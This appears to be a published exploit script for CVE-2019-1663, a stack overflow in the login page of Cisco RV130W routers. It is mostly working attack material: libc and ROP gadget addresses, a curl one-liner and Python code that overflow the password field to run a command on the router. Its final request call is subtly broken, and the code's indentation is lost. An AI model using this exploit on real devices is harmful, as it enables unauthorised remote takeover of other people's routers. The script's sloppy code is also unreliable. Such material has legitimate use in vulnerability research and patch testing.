#!/usr/bin/python
# Exploit Title: Cisco RV130W Remote Stack Overflow
# Google Dork: n/a
# Date: Advisory Published: Feb 2019
# Exploit Author: @0x00string
# Vendor Homepage: cisco.com
# Software Link: https://www.cisco.com/c/en/us/products/routers/rv130w-wireless-n-multifunction-vpn-router/index.html
# Version: 1.0.3.44 and prior
# Tested on: 1.0.3.44
# CVE : CVE-2019-1663
#
# 0x357fc000 - libc base addr
# 0x35849144 - system() addr
#
# 0x0002eaf8 / 0x3582AAF8: pop {r4, r5, lr}; add sp, sp, #8; bx lr;
# 0x0000c11c / 0x3580811C: mov r2, r4; mov r0, r2; pop {r4, r5, r7, pc};
# 0x00041308 / 0x3583D308: mov r0, sp; blx r2;
#
# gadget 1 system() junk gadget 2 junk junk junk junk junk gadget 3 text
# [0x3582AAF8][0x35849144][AAAA][0x3580811C][BBBB][CCCC][DDDD][EEEE][FFFF][0x3583D308][command]
#
# curl -k -X 'POST' --data "submit_button=login&submit_type=&gui_action=&default_login=1&wait_time=0&change_action=&enc=1&user=cisco&pwd=UUUUZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZVVVVWWWWXXXXYYYY`printf "\xf8\xaa\x82\x35\x44\x91\x84\x35AAAA\x1c\x81\x80\x35BBBBCCCCDDDDEEEEFFFF\x08\xd3\x83\x35ping 192.168.1.100\x00"`&sel_lang=EN" 'https://192.168.1.1:443/login.cgi'
#!/usr/bin/python
import requests
def banner():
print '''
@0x00string
0000000000000
0000000000000000000 00
00000000000000000000000000000
0000000000000000000000000000000
000000000 0000000000
00000000 0000000000
0000000 000000000000
0000000 000000000000000
000000 000000000 000000
0000000 000000000 000000
000000 000000000 000000
000000 000000000 000000
000000 00000000 000000
000000 000000000 000000
0000000 000000000 0000000
000000 000000000 000000
0000000000000000 0000000
0000000000000 0000000
00000000000 00000000
00000000000 000000000
0000000000000000000000000000000
00000000000000000000000000000
000 0000000000000000000
0000000000000
https://github.com/0x00string/oldays/blob/master/CVE-2019-1663.py
'''
def main():
banner()
command = "ping 192.168.1.100\x00"
print ("Sending exploit to execute [" + command + "]\n")
rop = "\xf8\xaa\x82\x35"+"\x44\x91\x84\x35"+"AAAA"+"\x1c\x81\x80\x35"+"BBBB"+"CCCC"+"DDDD"+"EEEE"+"FFFF"+"\x08\xd3\x83\x35"
payload = ("Z" * 446) + rop + command
url = "https://192.168.1.100:443/login.cgi"
data = {'submit_button': 'login','submit_type': '','gui_action': '','default_login': '1','wait_time': '0','change_action': '','enc': '1','user': 'cisco','pwd': payload,'sel_lang': 'EN'}
r = requests.post(url, payload=data)
if __name__ == "__main__":
main()